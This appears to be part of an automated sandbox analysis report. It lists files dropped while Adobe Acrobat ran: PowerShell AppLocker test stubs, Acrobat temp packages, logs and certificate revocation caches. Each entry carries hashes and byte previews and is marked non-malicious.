                                              SHA1:8A08D38F542B2E1FE2CFA4DCA70940681A2F2AED
                                              SHA-256:EF25175DCAB42DB06F6255F08840416F0F1119920BDF0F9710CD79BD1CB37BCF
                                              SHA-512:976276ED390E590868D4C7D2DEDFC8A331BF5D88D5472B5F4850B54AFA07F2D6FD90A77AA09587DDE4CD7A447C6DC4603BB4D27649146E07B3A8A3002124F5E8
                                              Malicious:false
                                              Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.5./.0.1./.2.0.2.5. . .0.4.:.4.4.:.1.1. .=.=.=.....

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1pxarqz.orv.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgydte2o.245.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pjawmf0p.dkv.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2rq5h5d.y10.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ubirbunw.cvo.ps1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zt3fdw25.k2a.psm1

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\A915p8l8r_c8ndrb_230.tmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                              Category:dropped
                                              Size (bytes):144514
                                              Entropy (8bit):7.992637131260696
                                              Encrypted:true
                                              SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                              MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                              SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                              SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                              SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                              Malicious:false
                                              Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\A91grbk69_c8ndrg_230.tmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
                                              Category:dropped
                                              Size (bytes):144514
                                              Entropy (8bit):7.992637131260696
                                              Encrypted:true
                                              SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
                                              MD5:BA1716D4FB435DA6C47CE77E3667E6A8
                                              SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
                                              SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
                                              SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
                                              Malicious:false
                                              Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..

                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-05 04-44-05-242.log

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with very long lines (393)
                                              Category:dropped
                                              Size (bytes):16525
                                              Entropy (8bit):5.345946398610936
                                              Encrypted:false
                                              SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
                                              MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
                                              SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
                                              SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
                                              SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
                                              Malicious:false
                                              Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:

                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):15114
                                              Entropy (8bit):5.330392107006663
                                              Encrypted:false
                                              SSDEEP:384:4ghn8ghK4ghKVghKQghKcghKxghKuVgh01gh0egh01Sgh0sgh0ggh0ughCLghCtb:ZhNhGh7hehUhhhlmh/hghsrhghmhmh5m
                                              MD5:1935B63B9FFA3DC86736074C38089368
                                              SHA1:3DA0A2C8512484A9F5F31B599AF287A390257233
                                              SHA-256:98DD5C20B117F5E1DC54A596958DFDA87720AC8FAA09D856F946416A9C33B66B
                                              SHA-512:260A55D00DAAB5FC7DB71AA7DFD6E5AE6EFB360233C33054C2725B97045C41DCA169D8EAF37FA7C9262CA6138D7998A8C237E27AD7AF6D2E1F0F281584B9CE48
                                              Malicious:false
                                              Preview:SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:284-0500 ThreadID=8320 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=35294104-5f19-4644-9995-08c4886d5af6.1736070245284 Timestamp=2025-01-05T04:44:05:289-0500 ThreadID=8320 Component=ngl-lib_NglAppLib Description="SetConf

                                              C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):29752
                                              Entropy (8bit):5.382445617555816
                                              Encrypted:false
                                              SSDEEP:768:anddBuBYZwcfCnwZCnR8Bu5hx18HoCnLlAY+iCBuzhLCnx1CnPrRRFS10l8gT2r5:PT99BI92vIYfoTKzoT9wDkvTzn2zKU
                                              MD5:D40A077E7A169861FEBB0048E46A7C45
                                              SHA1:E637CBAA5C68E5F9CE096133411FCDFB0DE0D268
                                              SHA-256:6757B58669AD8A7E5DD64707BE01EA9B64B750BDE2599C49000355840D7D5DB4
                                              SHA-512:3DD8C74284C545ACD595EA9B2D55196CB16FB9070453FA46041857740B9C70D3737F29F065FCB1658932B0E00DC8840C3DEC0E5345CC8F1674B5A7292278D637
                                              Malicious:false
                                              Preview:03-10-2023 12:50:40:.---2---..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ***************************************..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Starting NGL..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..03-10-2023 12:50:40:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..03-10-2023 12:50:40:.Closing File..03-10-

                                              C:\Users\user\AppData\Local\Temp\acrocef_low\9488d07b-a7eb-48ad-a7b2-ebd7873f4d4a.tmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                              Category:dropped
                                              Size (bytes):386528
                                              Entropy (8bit):7.9736851559892425
                                              Encrypted:false
                                              SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                              MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                              SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                              SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                              SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                              Malicious:false
                                              Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                              C:\Users\user\AppData\Local\Temp\acrocef_low\a53a7a67-f4ec-4289-b2ca-6dcce184ddc2.tmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                              Category:dropped
                                              Size (bytes):1419751
                                              Entropy (8bit):7.976496077007677
                                              Encrypted:false
                                              SSDEEP:24576:/ewYIGNPgOWL07oXGZYydpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:WwZGDWLxXGZYy3mlind9i4ufFXpAXkru
                                              MD5:B5A02C3D681A7AB59BFAC60042210B9E
                                              SHA1:28F87F32A4AC3381299901EDD03BB1C4BFD4C053
                                              SHA-256:B9E5CD9C8234873C74D1004A7DE9D375BE42DB3ECA0F2A29CCEB21C5A88375AC
                                              SHA-512:EF8F24646CEEF80D444C526439FD300555F5B2E5773534ED02BA5B0A6ADB87B5D3B23034095E232E4DB2E2AA777A672D93A4E3F715E41867CA42A72D1E5A632A
                                              Malicious:false
                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                              C:\Users\user\AppData\Local\Temp\acrocef_low\aca49c1b-3a38-4994-9dc5-5382fa8e6f37.tmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                              Category:dropped
                                              Size (bytes):1407294
                                              Entropy (8bit):7.97605879016224
                                              Encrypted:false
                                              SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                              MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                              SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                              SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                              SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                              Malicious:false
                                              Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                              C:\Users\user\AppData\Local\Temp\acrocef_low\f70ada5b-6da6-4c96-a81a-9d70bb0b208f.tmp

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                              Category:dropped
                                              Size (bytes):758601
                                              Entropy (8bit):7.98639316555857
                                              Encrypted:false
                                              SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                              MD5:3A49135134665364308390AC398006F1
                                              SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                              SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                              SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                              Malicious:false
                                              Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                              C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):98682
                                              Entropy (8bit):6.445287254681573
                                              Encrypted:false
                                              SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                              MD5:7113425405A05E110DC458BBF93F608A
                                              SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                              SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                              SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                              Malicious:false
                                              Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                                              C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                              Download File
                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):737
                                              Entropy (8bit):7.501268097735403
                                              Encrypted:false
                                              SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                              MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                              SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                              SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                              SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                              Malicious:false
